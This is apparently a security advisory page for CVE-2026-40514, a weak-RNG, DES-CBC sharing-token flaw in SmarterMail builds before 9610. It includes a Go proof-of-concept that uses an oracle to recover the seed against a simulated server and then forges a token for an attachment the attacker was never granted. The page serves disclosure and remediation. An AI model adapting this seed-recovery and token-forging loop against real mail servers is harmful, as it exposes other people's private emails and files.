CVE-2026-40514: SmarterTools SmarterMail < Build 9610 Cryptographic Weakness via Weak RNG

Published Apr 27, 2026

SmarterTools SmarterMail builds prior to 9610 contain a cryptographic weakness in the file and email sharing endpoints: sharing tokens are protected with DES-CBC, and the key and initialization vector are derived from System.Random seeded with insufficient entropy, leaving only about 19,000 possible seeds. An unauthenticated attacker can use the attachment download endpoint as an oracle to identify the seed in use, derive the key and IV, and forge sharing tokens for arbitrary emails, attachments, or file storage contents without prior access to the targeted content.
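The description above can be worked through as a model. The Go program below is an added example written for this page, not SmarterMail code, and it rests on stated assumptions: Go's math/rand stands in for System.Random; the seed is taken from 0..18999 (the advisory's rough figure, since the real seed derivation is not public here); the DES key and IV are the first 16 bytes of the seeded stream; share records look like `share:<attachment id>`; and the download endpoint answers differently for a token it cannot decrypt than for an unknown attachment. Under those assumptions it shows the oracle loop that recovers the seed with at most one request per candidate, and then forges a link to an attachment the attacker was never granted.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"fmt"
	"math/rand"
	"strings"
)

// seedSpace is the advisory's rough figure. How the product derives its seed is
// not public here, so this model simply enumerates 0..seedSpace-1 (assumption).
const seedSpace = 19000

// keyIV is the modeled weakness: DES key and IV drawn from a seeded, non-cryptographic
// PRNG. Go's math/rand stands in for System.Random (assumption); what matters is
// that the whole stream is a pure function of a seed taken from a tiny space.
func keyIV(seed int32) (key, iv []byte) {
	r := rand.New(rand.NewSource(int64(seed)))
	buf := make([]byte, 16)
	for i := range buf {
		buf[i] = byte(r.Intn(256))
	}
	return buf[:8], buf[8:]
}

// sealToken encrypts a share record with DES-CBC and PKCS#7 padding.
func sealToken(seed int32, record string) []byte {
	key, iv := keyIV(seed)
	blk, _ := des.NewCipher(key) // key is always 8 bytes, so this cannot fail
	n := 8 - len(record)%8
	pt := append([]byte(record), bytes.Repeat([]byte{byte(n)}, n)...)
	cipher.NewCBCEncrypter(blk, iv).CryptBlocks(pt, pt)
	return pt
}

// openToken decrypts and unpads; ok is false for anything that is not a valid token.
func openToken(seed int32, token []byte) (rec string, ok bool) {
	if len(token) == 0 || len(token)%8 != 0 {
		return "", false
	}
	key, iv := keyIV(seed)
	blk, _ := des.NewCipher(key)
	pt := make([]byte, len(token))
	cipher.NewCBCDecrypter(blk, iv).CryptBlocks(pt, token)
	n := int(pt[len(pt)-1])
	if n == 0 || n > 8 || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return "", false
	}
	return string(pt[:len(pt)-n]), true
}

// mailServer models the attachment download endpoint. That it answers one way for a
// token it cannot decrypt and another for an unknown attachment is the assumed oracle.
type mailServer struct {
	seed  int32
	items map[string]string // attachment id -> content (constructed sample data)
}

const respMalformed = "400 malformed token"

func (s *mailServer) download(token []byte) string {
	rec, ok := openToken(s.seed, token)
	if !ok || !strings.HasPrefix(rec, "share:") {
		return respMalformed
	}
	if body, found := s.items[strings.TrimPrefix(rec, "share:")]; found {
		return "200 " + body
	}
	return "404 no such attachment"
}

// recoverSeed seals a probe under every candidate seed and submits it. Only the
// server's seed turns the probe into a well-formed record, so any reply other than
// "malformed" exposes the seed after at most seedSpace unauthenticated requests.
func recoverSeed(oracle func([]byte) string) (int32, bool) {
	for seed := int32(0); seed < seedSpace; seed++ {
		if oracle(sealToken(seed, "share:probe")) != respMalformed {
			return seed, true
		}
	}
	return 0, false
}

// forgeShare is the payoff: with the seed known, a link to any attachment id can be
// minted without ever having been granted access to it.
func forgeShare(seed int32, attachmentID string) []byte {
	return sealToken(seed, "share:"+attachmentID)
}

func main() {
	srv := &mailServer{seed: 17231, items: map[string]string{"att-0042": "quarterly-report.pdf"}}
	seed, ok := recoverSeed(srv.download)
	fmt.Println("recovered seed:", seed, ok)
	fmt.Println(srv.download(forgeShare(seed, "att-0042")))
}
```

Running it prints the recovered seed and a 200 response carrying the sample attachment the attacker never had access to. The cost of the loop is one DES operation per candidate, so the 19,000-value seed space is exhausted in well under a second; DES's own 56-bit key never has to be attacked. The durable fix for this class of bug is to draw keys and IVs from a cryptographic RNG and to authenticate tokens (for instance with an HMAC over the ciphertext) so that a forged token is rejected before any decryption takes place.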

Affected Software

SmarterTools SmarterMail < 9610

Event History

Apr 27, 2026
CVE Published via MITRE, 02:21 PM
Data Sourced via MITRE, 02:21 PM (description, severity, weakness)
Data Sourced via NVD, 03:16 PM (description, severity, weakness)

Frequently Asked Questions

1. What is the severity of CVE-2026-40514?

CVE-2026-40514 is considered a high severity vulnerability: an unauthenticated attacker can recover the RNG seed through the download-endpoint oracle, derive the DES key and IV, and forge sharing tokens that expose arbitrary emails, attachments, and file storage contents.

2. How do I fix CVE-2026-40514?

Upgrade SmarterTools SmarterMail to build 9610 or later. Because the keys and IVs used by earlier builds are derivable from a small seed space, also review sharing links that were issued before the upgrade.

3. What specific weakness does CVE-2026-40514 introduce?

CVE-2026-40514 is a cryptographic weakness: sharing tokens are encrypted with DES-CBC, and both the key and the IV are generated by System.Random seeded from a space of roughly 19,000 values, so the keys are predictable by brute force. DES is itself a deprecated 56-bit cipher, but the tiny seed space makes recovering the key far cheaper than attacking DES directly.

4. Which versions of SmarterMail are affected by CVE-2026-40514?

CVE-2026-40514 affects all versions of SmarterTools SmarterMail prior to build 9610.

5. What are the potential impacts of exploiting CVE-2026-40514?

An attacker who recovers the seed can mint sharing tokens for arbitrary emails, attachments, or file storage contents and read them without authentication or any prior access to the targeted content.

© 2026 SecAlerts Pty Ltd.